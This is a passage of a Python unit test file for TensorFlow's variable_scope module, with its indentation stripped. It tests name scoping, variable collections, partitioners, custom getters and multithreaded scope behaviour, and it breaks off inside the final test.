self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name,
"outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
# (different assertions failing after wrapping, in both execution modes)
@test_util.run_in_graph_and_eager_modes
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
# Since variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSignatureGetVarVsGetLocalVar(self):
"""get_{local,}variable() must take the same list of args."""
arg_names = tf_inspect.getargspec(variable_scope.get_variable)[0]
local_arg_names = tf_inspect.getargspec(
variable_scope.get_local_variable)[0]
self.assertEqual(arg_names, local_arg_names)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetCollection(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetTrainableVariablesWithGetVariable(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.get_variable(
"testGetTrainableVariables_d", [],
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
# All other sync values sets trainable=True
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetTrainableVariablesWithVariable(self):
with self.cached_session():
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_a")
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_b")
_ = variable_scope.variable(
1.0, name="testGetTrainableVariables_c", trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_d",
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
# All other sync values sets trainable=True
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetGlobalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetLocalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = variable_scope.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = variable_scope.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesUnprovidedArgsAndNoShape(self):
with self.assertRaisesRegexp(
ValueError,
"The initializer passed is not valid. It should be a callable with no "
"arguments and the shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be fully defined."):
variable_scope.get_variable("foo", initializer=lambda x: [2])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part
def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part
def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part
class VariableScopeWithPartitioningTest(test.TestCase):
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testResultNameMatchesRequested(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
def testNoReuseInEagerByDefault(self):
with context.eager_mode():
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v1 = variable_scope.get_variable("name0", shape=(3, 1, 1))
v2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertIsNot(v1, v2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxisResource(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
def testPartitionConcatenatesAlongCorrectAxisResourceInEager(self):
with context.eager_mode():
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = variable_scope.VariableSynchronization.AUTO
aggregation = variable_scope.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
variable_scope.get_variable("v", [1])
self.assertEqual(1, called[0])
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
synchronization = variable_scope.VariableSynchronization.ON_READ
aggregation = variable_scope.VariableAggregation.MEAN
variable_scope.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'custom_getter/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("custom_getter/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
@test_util.run_deprecated_v1
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = self.evaluate([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'sum_getter_2/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("sum_getter_2/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
@test_util.run_deprecated_v1
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = self.evaluate([true_vars, v])
# take products of sums of products
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
variable_scope.VariableAggregation.MEAN)
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creater_c):
variable_scope.get_variable(
"v", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = ops.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = variable_scope.variable_creator_scope(creator)
scope.__enter__()
with variable_scope.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
class PartitionInfoTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
